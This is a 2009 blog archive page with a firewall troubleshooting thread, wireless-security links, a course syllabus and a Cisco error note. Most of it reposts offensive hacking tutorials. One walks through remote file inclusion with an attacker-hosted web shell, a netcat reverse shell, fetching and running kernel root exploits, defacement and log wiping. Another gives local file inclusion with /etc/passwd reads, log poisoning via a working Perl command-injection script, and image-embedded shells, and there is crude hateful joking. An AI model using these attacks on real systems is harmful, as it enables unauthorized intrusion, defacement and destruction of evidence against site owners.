Monday, January 26, 2009

FAQ from firewall admim to the client for troubleshooting purpose

Jan 13 2009, 09:22 AM

Let say you are working as firewall admin. One day, client A has calling you and tells that he have problem to access application in server B.
I was wondering if anyone here are working as firewall support, what are the questions that you need to ask if the incident like this happen to you? I’ll list some of them and the purpose why the information is needed, maybe you could add or give better suggestion.

1. What is the firewall name/ip address (so we know which firewall involved in this incident)
2. What is the source and destination ip address (so we can check whether the traffic hit the firewall or not)
3. traceroute result from source to destination ip. (so we know if the traffic was dropped at somewhere else)
4. what is the incident number (if you are using the ticketing system so we can keep track what happened.)
5. Has this work before? (if it worked, the possibilities of some changes has been done to the firewall or server) 

Blake @ Jan 13 2009, 03:22 PM


6. What application and protocol are they using to access the server.
7. Can they access any other server using the same application and protocol
8. Has the client or host made any upgrades or patches recently
9. What version of VPN software is the client using.
Also I always start a remote desktop session using logmein.com or some other software. Speeds up the entire process when you can see the clients desktop.

packet @ Jan 19 2009, 11:31 PM

And of course:

10: when did it stop working?
11: Reboot!

Comparison of Wireless LAN Standards


http://www.mobileinfo.com/wireless_lans/802.11a_802.11b.htm

SANS InfoSec Reading Room - Wireless Access

Various great papers on Wireless Security can be found here...

Crack WEP?

How To Crack WEP - Part 1 - 3
How To Crack WEP - Part 1: Setup & Network Recon

How To Crack WEP - Part 2: Performing the Crack

How To Crack WEP - Part 3: Securing your WLAN

WEP: Dead Again, Part 1
Michael Ossmann 2004-12-14

WEP: Dead Again, Part 2
Michael Ossmann 2005-03-08

How RFID Works

Long checkout lines at the grocery store are one of the biggest complaints about the shopping experience. Soon, these lines could disappear when the ubiquitous Universal Product Code (UPC) bar code is replaced by smart labels, also called radio frequency identification (RFID) tags. RFID tags are intelligent bar codes that can talk to a networked system to track every product that you put in your shopping cart.

Read more here...

http://electronics.howstuffworks.com/rfid.htm/printable

Wireless and Mobile Security/Keselamatan Tanpa Wayar dan Mudahalih

Subject Name

Wireless and Mobile Security

Subject Code

IWD 2243

Status

Teras Major

Level

Diploma

Credit hours

3 hours

Pre Requisite

IWD2323- Computer Security

Assessment

Final examination – 40%

Mid-semester test – 20%,

Course Work- 40%

Semester Thought

Year 2, Semester 2

Synopsis

The use of wireless networks and mobile communications has become a major trend these days.  Wireless and mobile communications offer many benefits such as portability and flexibility, increased productivity, and lower installation costs. Wireless technologies cover a broad range of differing capabilities oriented toward different uses and needs. Wireless local area network (WLAN) devices, for instance, allow users to move their laptops from place to place within their offices without the need for wires and without losing network connectivity.  Mobile and wireless security is therefore of high priority. Security measures taken depend on the different protocols, standards, techniques and systems available. A brief introduction to security protocols, standards and corresponding technologies is given in this subject particularly on 2G, 2.5G, 3G and wireless local area networks. Standards, like WAP, IEEE 802.11 and Bluetooth are included as well as the awareness of the vulnerabilities, threats and countermeasures associated with these wireless technologies

Learning Objective

Aim

In this course, student should be able to gain a solid understanding of the security weaknesses of and threats to wireless LANs ,  understand wireless network design and deployment ,  implement the best security techniques currently available ,  introduce the latest security software and protocols for wireless LANs ,  introduce the best resources for wireless security issues and decisions to the organization

Course learning Outcomes

Upon successful completion of the course, the students should be able to:

  1. Have a clear understanding of the full range of wireless technologies in common use and how to implement them safely.
  2. Understand how to secure wireless systems and prevent threats posed by hackers.
  3. Understand how wireless devices, components and protocols work, how to determine the best wireless solutions for their environments, and how to implement, secure and maintain these solutions.

Monday, January 12, 2009

Error Message %PIX-1-105009: (Primary) Testing on interface int_name result.

Error Message %PIX-1-105009: (Primary) Testing on interface int_name result.
Explanation This is a failover message. This message reports the result (either "Passed" or "Failed") of a previous interface test. "(Primary)" can also be listed as "(Secondary)" for the secondary unit.

Recommended Action None required if the result is "Passed." If the result is "Failed," you should check the network cable connection to both failover units, that the network itself is functioning correctly, and verify the status of the standby unit.

http://www.cisco.com/univercd/cc/td/doc/product/iaabu/pix/pix_62/syslog/pixemsgs.htm

Friday, January 9, 2009

R.F.I. Rooting Tutorial (Linux Server and Safe Mod: OFF)

=======================================================================
R.F.I. Rooting Tutorial (Linux Server and Safe Mod: OFF)

Author: An@sA_StAxtH
Mail/MSN: admin@cyberanarchy.org/anasa_staxth@hotmail.com

For Cyber Anarchy (Nov. 2007)
=======================================================================

You will need:

- Vulnerable Site in R.F.I.
- Shell for R.F.I. (e.g. c99, r57 or other)
- NetCat
- Local Root Exploit (depending on the kernel and the version)

This aim tutorial is to give a very general picture in process of Rooting
in Linux Server with Safe Mod: OFF.

-

Suppose that we have found a site with R.F.I. vulnerability:

http://www.hackedsite.com/folder/index.html?page=

e can run shell exploiting Remote File Inclusion, as follows:

http://www.hackedsite.com/folder/index.html?page=http://www.mysite.com/shells/evilscript.txt?

where evilscript.txt is our web shell that we have already uploaded to
our site. (www.mysite.com in the folder: shells)

After we enter in shell, first of all we will see the version of the kernel
at the top of the page or by typing: uname - a in Command line.

To continue we must connect with backconnection to the box. This can done with
two ways if we have the suitable shell.

We can use the Back-Connect module of r57/c99 shell or to upload a backconnector
in a writable folder

In most of the shells there is a backconnection feature without to upload the
Connect Back Shell (or another one shell in perl/c). We will analyze the first
way which is inside the shell (in our example the shell is r57).

Initially we open NetCat and give to listen in a specific port (this port must
be correctly opened/forwarded in NAT/Firewall if we have a router) with the
following way:

We will type: 11457 in the port input (This is the default port for the last versions
of r57 shell). We can use and other port.

We press in Windows Start -> Run -> and we type: cmd
After we will go to the NetCat directory:

e.g.

cd C:\Program Files\Netcat

And we type the following command:

nc -n -l -v -p 11457

NetCat respond: listening on [any] 11457 ...

In the central page of r57 shell we find under the following menu::: Net:: and
back-connect. In the IP Form we will type our IP (www.cmyip.com to see our ip if
we have dynamic)

In the Port form we will put the port that we opened and NetCat listens.

If we press connect the shell will respond:

Now script try connect to port 11457 ...

If our settings are correct NetCat will give us a shell to the server

Now we wil continue to the Rooting proccess.

We must find a writable folder in order to download and compile the Local
Root Exploit that will give us root priviledges in the box. Depending on the version
of the Linux kernel there are different exploits. Some times the exploits fail to run
because some boxes are patched or we don't have the correct permissions.

List of the exploits/kernel:

2.4.17 -> newlocal, kmod, uselib24
2.4.18 -> brk, brk2, newlocal, kmod
2.4.19 -> brk, brk2, newlocal, kmod
2.4.20 -> ptrace, kmod, ptrace-kmod, brk, brk2
2.4.21 -> brk, brk2, ptrace, ptrace-kmod
2.4.22 -> brk, brk2, ptrace, ptrace-kmod
2.4.22-10 -> loginx
2.4.23 -> mremap_pte
2.4.24 -> mremap_pte, uselib24
2.4.25-1 -> uselib24
2.4.27 -> uselib24
2.6.2 -> mremap_pte, krad, h00lyshit
2.6.5 -> krad, krad2, h00lyshit
2.6.6 -> krad, krad2, h00lyshit
2.6.7 -> krad, krad2, h00lyshit
2.6.8 -> krad, krad2, h00lyshit
2.6.8-5 -> krad2, h00lyshit
2.6.9 -> krad, krad2, h00lyshit
2.6.9-34 -> r00t, h00lyshit
2.6.10 -> krad, krad2, h00lyshit
2.6.13 -> raptor, raptor2, h0llyshit, prctl
2.6.14 -> raptor, raptor2, h0llyshit, prctl
2.6.15 -> raptor, raptor2, h0llyshit, prctl
2.6.16 -> raptor, raptor2, h0llyshit, prctl

We will see the case of 2.6.8 Linux kernel. We will need the h00lyshit exploit.

Some sites that we can find Local Root Exploits:

www.milw0rm (Try Search: "linux kernel")

Other sites: www.packetstormsecurity.org | www.arblan.com
or try Googlin' you can find 'em all ;-)

We can find writable folders/files by typing:

find / -perm -2 -ls

We can use the /tmp folder which is a standard writable folder

We type: cd /tmp

To download the local root exploit we can use a download command for linux like
wget.

For example:

wget http://www.arblan.com/localroot/h00lyshit.c

where http://www.arblan.com/localroot/h00lyshit.c is the url of h00lyshit.

After the download we must compile the exploit (Read the instruction of the exploit
before the compile)

For the h00lyshit we must type:

gcc h00lyshit.c -o h00lyshit

Now we have created the executable file: h00lyshit.

The command to run this exploit is:

./h00lyshit

We need a very big file on the disk in order to run successfully and to get root.

We must create a big file in /tmp or into another writable folder.

The command is:

dd if=/dev/urandom of=largefile count=2M

where largefile is the filename.

We must wait 2-3 minutes for the file creation

If this command fails we can try:

dd if=/dev/zero of=/tmp/largefile count=102400 bs=1024

Now we can procced to the last step. We can run the exploit by typing:

./h00lyshit largefile or

./h00lyshit /tmp/largefile

(If we are in a different writable folder and the largefile is created in /tmp)

If there are not running errors (maybe the kernel is patched or is something wrong with
exploit run or large file) we will get root

To check if we got root:

id or

whoami

If it says root we got root!

Now we can deface/mass deface all the sites of the server or to setup a rootkit (e.g.
SSHDoor) and to take ssh/telnet shell access to the server.

We must erase all logs in order to be safe with a log cleaner. A good cleaner for this
job is the MIG Log Cleaner.

-

*

http://www.packetstormsecurity.org/papers/attack/rfitutorial.txt

RFI Tutorial (remote file inclusion)

Basically, the include function in PHP allows contents from local or remote files to be pretty much "copied and pasted" and executed in a script at runtime.

Now suppose yo' dad wants a small website. All he wants is three pages.
A blog page where he can update you on how many babies he has killed.
A contact page with his email on it os people can ask advice on the best way to kill babies.
An gallery page where he can show you pictures of all the babies he has killed.

He creates four pages. blog.php, contact.php and gallery.php along with index.php, this is our "main" page that will contain a header, a side bar for navigation, some php and a footer.

You would view the pages on his website like this.
Code:
http://www.yodad.com/index.php?page=blog.php
http://www.yodad.com/index.php?page=contact.php
http://www.yodad.com/index.php?page=gallery.php
Let's take a look at the code for index.php

Code:
//html for header
//html for menu
$page = $_GET['page'];
include($page);
?>
//html for footer
On line 2, $page is set to $_GET['page']

This means when we go to
Code:
http://www.yodad.com/index.php?page=blog.php
$page is set to blog.php.
On line 3 it is "included". The contents from blog.php is copied and pasted into index.php

What's wrong with this? Well as I said earlier the include function can also include remote files. Files NOT on his web server.

Say we change "blog.php" to "http://www.google.com"
Code:
http://www.yodad.com/index.php?page=http://www.google.com
You would see the google home page instead of your dads shitty blog.

What's the point of this?

We can include "bad" or "evil" scripts. Some of you may heard of "shells" (r57,c99,g00nshell,peanut). Shells are scripts with functions like letting you view directories of the server it's executed on, deleting files, viewing files, letting you run system commands and more.

Here's how we would use it:
Code:
http://www.yodad.com/index.php?page=http://evilsite.com/c99.txt
* We have to use the shell as .txt so it's plaintext. If we used .php then the script would be executed on http://www.evilsite.com.

Let's look at another example of a RFI.

Undefined variables.

Say yo' dad has learned how to use MySQL and to put content on his blog page he uses a form he created to connect to his MySQL server and insert his stories into a table.

To connect to the MySQL server & add content he needs a username & a password. He stores these in a file called "db_details.php".

The blog.php file needs these credentials to connect and get the content.

so in index.php:
Code:
//html for header
//html for menu
$database_config_file = "db_details.php";
$page = $_GET['page'];
include($page);
?>
//html for footer
and in blog.php:

Code:
include($database_config_file);
//code to connect to MySQL and get the latest blog posts
?>
Since we are calling blog.php through index.php like this:
Code:
http://www.yodad.com/index.php?page=blog.php
, in index.php $database_config_file is set to "db_details.php" and in blog.php it is included. There is no problem there, it then can connect to the MySQL server with the credentials and retrieve his blog content.

But, if we went to blog.php directly:
Code:
http://www.yodad.com/blog.php
then $database_config_file is not set to anything. It still includes it but it is including nothing. Since we did not use index.php to access it, we did not get: $database_config_file = "db_details.php";

This is a problem, since we can set it ourselves.
If we go to
Code:
http://www.yodad.com/blog.php?database_config_file=http://evilsite.com/c99.txt
$database_config_file will be set to http://www.evilsite.com/c99.txt

Again, blog.php does not check if what it is including is valid.

...

As the famous inventor of PHP, Bill Gates says: There is more than one way to do it.

There are a few ways to prevent these vulnerabilities.

Yo' dad thinks he has gotten smart and has put in a method to stop little leet haxors like you.
This one is easily bypassed.
index.php:

Code:
$page = $_GET['page'];
include($page . ".php");
?>
This means when we go to index.php?page=home it will actually include home.php.

Omg, dat meanz it wont include my .txt, it will try to include .txt.php Sad.

Not necessarily. If we put a question mark after the ".txt" then anything that index.php puts after $page will go to the remote script we are including.

Like this:
Code:
http://www.yodad.com/index.php?page=http://evilsite.com/c99.txt
Index.php would try and include :
Code:
http://www.evilsite.com/c99.txt?.php
To prevent the problem with variables not being defined. Just make sure you define every variable that gets used.


There are a few other ways to prevent these vulnerabilities involving cleaning the input, checking if files exist etc but since I'm only typing with my big jew nose right now I can't be bothered going through them so I'm going to just do the most practical;

Switching.

Code:
$page = $_GET['page'];
switch($page){
case "blog":
include("blog.php");
break;
case "contact":
include("contact.php");
break;
case "gallery":
include("gallery.php");
break;
default: //A page wasn't chosen, or one that wasn't "home" or "gallery"
echo "Choose a page from our fine selection!1!!";
break;
}
?>

https://per1ova.startlogic.com/showthread.php?t=594

LFI Tutorial (local file inclusion)

This tutorial will guide you into the process of exploiting a website thru the LFI (Local File Inclusion).

First lets take a look at a php code that is vulnerable to LFI:
Code:
$page = $_GET[page];
include($page);
?>
Now, this is a piece of code that should NEVER be used, because the $page isn't sanitized and is passed directly to the webpage, but unfortunately (or not ) is very common to be find in the www world.

Ok, now that we know why is it vulnerable let's start to use this in our advantage. First let's take a look how this give us the ability to "browse" thru the web server. Let's imagine theres a file called test.php inside the test directory, if you type victim.com/test/test.php will retrive that file correct? Ok, but if the php code that we examined was in the index.php we could also retrive that file thru victim.com/index.php?page=test/test.php , see what happened there? Now, if the index.php was in victim.com/test/index.php and the test.php in victim.com/test.php you will have to type victim.com/test/index.php?page=../test.php . The ../ is called directory
transversal using that will allow you to go up in the directories.


Now that we can go up and down thru the server let's use it to access files that we are not supposed to. If this was hosted in a Unix server we can then possibly view the password file of the server, to do this you will have to type something like this (the nr of ../ may vary depending of where the vulnerable file is):
Code:
victim.com/index.php?page=../../../../../../../etc/ passwd
If you don't know what to do with the content of etc/passwd then continue reading! The etc/passwd is where the users/passwords are stored, a non shadowed passwd file will look like this:



username: passwd:UID:GID:full_name:directory:shell

For example:


username:kbeMVnZM0oL7I:503:100:FullName:/home/user name:/bin/sh

All you need to do then is grab the username and decode the password. If the passwd file is shadowed then you'll see something like this:


username:x:503:100:FullName:/home/username:/bin/sh

As you can see the password is now a x and the encoded password is now in /etc/shadow (you will probably not have access to etc/shadow because is only readable/writeable by root and etc/passwd has to be readable by many
processes, thats why you have access to it).

You can also sometimes see something like this:



username:!:503:100:FullName:/home/username:/bin/sh

The ! indicates that the encoded password is stored in the etc/security/passwd file.

Heres a couple of places that may be interesting to "visit":
Code:
/etc/passwd
/etc/shadow
/etc/group
/etc/security/group
/etc/security/passwd
/etc/security/user
/etc/security/environ
/etc/security/limits
/usr/lib/security/mkuser.default
You will probably need to google for it as this is not the right tutorial to it.

Just one more quick thing, its also common to find a vulnerable code like:
Code:
$page = $_GET["page"];
include("$page.php");
?>
In this case as you can see it will add a .php in the end of whatever you include! So if you type in your browser:
Code:
victim.com/index.php?file=../../../../../../../../ etc/passwd
it will retrieve:
victim.com/index.php?file=../../../../../../../../ etc/passwd.php that file don't exist, and you will see an error message, so you need to apply the null byte ():
Code:
victim.com/index.php?file=../../../../../../../../ etc/passwd
With the null byte the server will ignore everything that comes after .



There are other ways to use the LFI exploit, so continue reading, the REALLY fun is about to begin!


We will now gonna try to run commands on the server, we will do this by injecting php code in the httpd logs and then access them by the LFI! To do this first find out where the logs are stored, here is some locations that may be useful to you:
Code:
../apache/logs/error.log
../apache/logs/access.log
../../apache/logs/error.log
../../apache/logs/access.log
../../../apache/logs/error.log
../../../apache/logs/access.log
../../../../../../../etc/httpd/logs/acces_log
../../../../../../../etc/httpd/logs/acces.log
../../../../../../../etc/httpd/logs/error_log
../../../../../../../etc/httpd/logs/error.log
../../../../../../../var/www/logs/access_log
../../../../../../../var/www/logs/access.log
../../../../../../../usr/local/apache/logs/access_ log
../../../../../../../usr/local/apache/logs/access. log
../../../../../../../var/log/apache/access_log
../../../../../../../var/log/apache2/access_log
../../../../../../../var/log/apache/access.log
../../../../../../../var/log/apache2/access.log
../../../../../../../var/log/access_log
../../../../../../../var/log/access.log
../../../../../../../var/www/logs/error_log
../../../../../../../var/www/logs/error.log
../../../../../../../usr/local/apache/logs/error_l og
../../../../../../../usr/local/apache/logs/error.l og
../../../../../../../var/log/apache/error_log
../../../../../../../var/log/apache2/error_log
../../../../../../../var/log/apache/error.log
../../../../../../../var/log/apache2/error.log
../../../../../../../var/log/error_log
../../../../../../../var/log/error.log
Ok, now that you know where the logs are take a look at them and see what they store, at this example we will use a log that stores the "not found files" and the php code . You will then type at your browser victim.com/ and the php code will be logged because it "dosen't exist".

This possibly won't work because if you go look into the log you will probably see the php code like this:
Code:
%3C?%20passthru($_GET[cmd])%20?>
because your browser will url encode the whole thing! So you'll need to use something else, if you don't have a script of your own you can use this perl script i've wrote:
Code:
#!/usr/bin/perl -w
use IO::Socket;
use LWP::UserAgent;
$site="victim.com";
$path="/folder/";
$code="";
$log = "../../../../../../../etc/httpd/logs/error_log";

print "Trying to inject the code";

$socket = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>"$site", PeerPort=>"80") or die "
Connection Failed.

";
print $socket "GET ".$path.$code." HTTP/1.1
";
print $socket "User-Agent: ".$code."
";
print $socket "Host: ".$site."
";
print $socket "Connection: close

";
close($socket);
print "
Code $code sucssefully injected in $log
";

print "
Type command to run or exit to end: ";
$cmd = ;

while($cmd !~ "exit") {

$socket = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>"$site", PeerPort=>"80") or die "
Connection Failed.

";
print $socket "GET ".$path."index.php=".$log."&cmd=$cmd HTTP/1.1
";
print $socket "Host: ".$site."
";
print $socket "Accept: */*
";
print $socket "Connection: close

";

while ($show = <$socket>)
{
print $show;
}

print "Type command to run or exit to end: ";
$cmd = ;
}
Copy/paste that, save it as whatever.pl and change what is in bold accordingly to your victim site. If the vulnerable code is in victim.com/main/test.php you should change the /folder/ to /main/ , index.php= to test.php= and the ../../../../../../../etc/httpd/logs/error_log to where the log is at!

That script will inject the code and then will ask you for a command to run on the server! You know what to do now!


Last but not least we will take a look on how to use the avatar/image upload funtion found in a lot of web aplications.
You possibly have seen this in the "Local JPG Shell injection video" at milw0rm, but the best part here that was not mentioned is that the web aplication DOES N'T need to be installed on your victim website!

This is a quick explanation, for a better understanding you can view the video at :
Code:
http://www.milw0rm.com/video/watch.php?id=57
OR, IF you want a private way to upload shell in the server visit this link :
Code:
http://per1ova.com/showthread.php?t=400
This article is in the PREMIUM AREA so you need to be a VIP member

You need to "insert" the php code you want to execute inside the image, to do this you'll need to use your favorite hex editor or you can use the edjpgcom program (all you need to do is right click on the image, open with..., then select the edjpgcom program and then just type the code). Ok now that you have your shell in the image all you need to do is upload it! If your victim.com has a forum or something else that allows you to upload great, if not check if its in a shared hosting, if so do a reverse lookup on it!


Now that you have a list of potential sites that may have a forum or something else that allows you to upload your image all you need to do is take some time to browse thru them until you find one!


After you found one and have uploaded your image here is tricky part, you'll need to "create" an error on it (in order to find the server path to it)! Try per example create an mysql error and you will get something like this:
Code:
Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in /home/sitefolder/public_html/includes/view.php on line 37
If you can't force an error go back to the etc/passwd file:

Code:
username:kbeMVnZM0oL7I:503:100:FullName:/home/username:/bin/sh
As you can see the username is also the directory name, most of the times the name is similar to the domain name, but if not the case you'll have to try them until you find the one you're looking for!


Go to your avatar image right click on it and then properties (write down the path to it), you'll now all set up.

In your browser type this (again, the nr of ../ may vary):
Code:
victim.com/index.php=../../../../../../../../../ho me/the_other_site_dir/public_html/path_to_your_avatar/avatar.jpg
In order "words" should look like this (using fictitious "names"):

Code:
victim.com/index.php=../../../../../../../../../ho me/arcfull/public_html/forum/uploads/avatar.jpg
After you type this you will see the result of the code inserted in the image!

https://per1ova.startlogic.com/showthread.php?t=595

LinkWithin

Related Posts with Thumbnails